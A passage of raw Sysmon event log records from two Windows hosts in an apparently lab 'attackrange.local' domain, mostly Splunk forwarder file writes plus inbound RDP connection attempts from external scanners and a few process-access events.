Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C8EC01E93BFDB868DEAACC0FE4E258D1,SHA256=D8CFF4495F3FE7429838DB5CFD94417B93D9CA2B2E4E3CD10FF02F301878B76E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051086Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:45.582{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C15BB6C77BF293492B5FA9F297B36C2,SHA256=F128FFD864A9D5F411043B62E954F328D2662EDAF6AD96E214A379D6652EECA0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:45.682{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-31144-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:46.292{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF6C2526EEE4FF87F60A36BDA532A631,SHA256=A69C547FFCB289658793EDF2ADD43EAD473B3595D86071D808393BC262EC3F47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:46.042{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E7D214E66FBD00A209BEA59C6507209,SHA256=0603262228786EE0C6F30F5AE83E926D197C68ED1A60ADADA8EC9A3642976F6E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051091Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:45.292{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63224-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051090Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:43.843{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61756-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051089Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:46.583{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=924D27C76AFD5E025BC7DC157DE097BB,SHA256=F52EC9F72AACDFF4E8A043A9F242D1CDEFF6AA7A678AB9A68BFA5FE2C98E4026,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:47.682{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F128DB7A03C17AC8B5B6A6F4EB6AD56C,SHA256=FB31D480F818119DA6B6B08FA8C487AB84A495E1A5A13698BE19FAE9BE5F4C81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:47.057{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F55253592E85301756C4214BC58EF415,SHA256=5B42B052BBF7EE19FFBDA2AEEC118F90357EBE4ADFCE6B6AA700418A28E3CCF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051093Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:47.583{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7983EA4B5501A657A382AF2B8C4616C4,SHA256=0E579387178A8D2B8C5187AAEDDF326129C745963442DA773033C098C85E1D03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051092Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:47.537{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=99BB392DE4DBDDBAF2EE94FF4CD59635,SHA256=456FDCD8CA5CC0E5608B0194D04B2D143F5E8A49CEC29AF268E6D010BF927FE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:48.073{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2D8D7D2152A64B2F0E14223DB37FF3C,SHA256=CAD000133738C3DF312AC48993658D0A74E1D27E5417F09549FC2C44B958BF81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051094Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:48.599{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E1D299F78CA9A4FB3EFB45F1EF8516E,SHA256=D6F6ED656349F24D4EF5E8B0C5FA55E9FE2F93ED83F2C0B9881AB828422C60A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:49.916{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=99962EE2CCC204C15C25D3BAF525ACD5,SHA256=89CAE75498BE011064E46867F2706B04D79B0C54B65643DEFB9CD8E51AD13DDE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:47.685{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com59329-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:47.181{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-35208-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:47.105{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57673-false10.0.1.12-8000- 23542300x800000000000000082420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:49.088{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB5E80ED8F9AF2868F40EC8F36EA5581,SHA256=6204B89C805131BF83D5B7B79245907227290321551392DE7B16A2853A69924C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051097Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:49.615{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=499548ABF7A34F0427E235DDAFCA47EB,SHA256=15FC5000530BFDBE06144174AE045F59FF6436C9C205302B600B82F813A48C6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051096Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:49.177{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7AC776B8F5A80AD7A0F3FF08E463C2E1,SHA256=92B82FC76B052919BE7B5BC8260AB7D6BC0EBD93E08557363DF93725428036F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051095Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:46.861{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64693-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000082426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:48.736{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-33854-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:50.104{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E260AE3739A6A4F42CC27857F0A9AB79,SHA256=20E26CD9F71C8D1543C0829AE5BF6F651FE82ECADFBE39BEAC503E6492111242,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051101Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:50.615{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C99730DB93D05B2FBAB07400EFC64EC9,SHA256=9D6583AB626D7BC10613E7C1120AFF18BEC3784CD303C466C14D515319368D60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051100Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:50.583{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5FABC80B4291ABA90EF62E4BAA1CE8F0,SHA256=A9AF6855DDD5EA1C01737C66454C93C4A619413379051975C2B08B0A6230B9F4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051099Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:48.338{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49775-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051098Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:47.798{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52567-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000082427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:51.120{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3554BE46E1CFC34498EA6AA55F3F4FAD,SHA256=46ADDF03754446D814B8B891DC5E69534417C63F2E1C10D9E0F9FD7553FEDF4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051102Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:51.630{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10488F87A58782033F99F1FF2D9D420D,SHA256=20C988A26699520B37DA049894C39944E49227C0B05A142806B37D59DD625704,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:52.307{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C9ECFB6DF3040F3BB15B72ACD7C10B9A,SHA256=785CE3677A3160ED727CE957251F459A8ED468BE0E3724A5A061EF6C77FB2798,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:50.128{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-37916-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:52.151{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CB2A2CDBE06F5ABD4BCBB496B842D49,SHA256=676BD41296E63FC3EEDFD0703D1E45BF03C8E6B3C713C023C6B80867347DAF3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051104Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:52.646{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64655DFF18C3F627DEE9421C65E22885,SHA256=A569F95C21DF4B37EDC26684A33C114C742CC46B1AAFD2AB95D448DF3AFD75F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051103Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:49.834{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51230-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:53.385{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B82D1EFE7A1CC9811ED8930C582211AC,SHA256=A8B8BCBE279C6993C361ACBEEE42B605DCFC43F9E26C90EAA0865E1916FA6D29,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:52.136{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57674-false10.0.1.12-8000- 354300x800000000000000082434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:51.738{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com61173-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:51.704{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-36561-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:51.596{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-39270-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:53.166{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7AA8CE33C5934D7C031698F9A5953B4,SHA256=C1744E13D0D31C42FF302BDCE3FACE47D6F68298DCCA79185D588A3454174BF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051107Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:53.646{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1083E355787B39C2943A081A5DA9BA5,SHA256=4887AB31FA7E8B0BAB11FCC67F58AAC1D361E3855706D91E7331BE140BF65260,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051106Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:51.165{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com60506-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051105Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:53.333{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0F5098F46731DE09CBDC522C20EF847,SHA256=21710CD869A8D34CD43696D18B8B4559C98FD59787121F75F6361E5EC2482BC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:54.979{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95E53B56EF6B2F80A381A79A6FA7ADDC,SHA256=0A6B953AF6CA893276E2033752F3FE4E3581D3E46E8A39A5E6D39908DB60BE7D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:52.691{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com50172-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:54.245{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60E6A109DA3D78374DCFE3F47CFB1C7F,SHA256=42E9D6757A6CF5577A50ECA60CCDCB41CE6C479CCED29304746A0A8089932C8D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000051121Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:54.802{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-ECA6-607E-FE06-00000000BB01}3112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051120Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:54.802{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051119Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:54.802{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051118Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:54.802{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051117Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:54.802{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051116Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 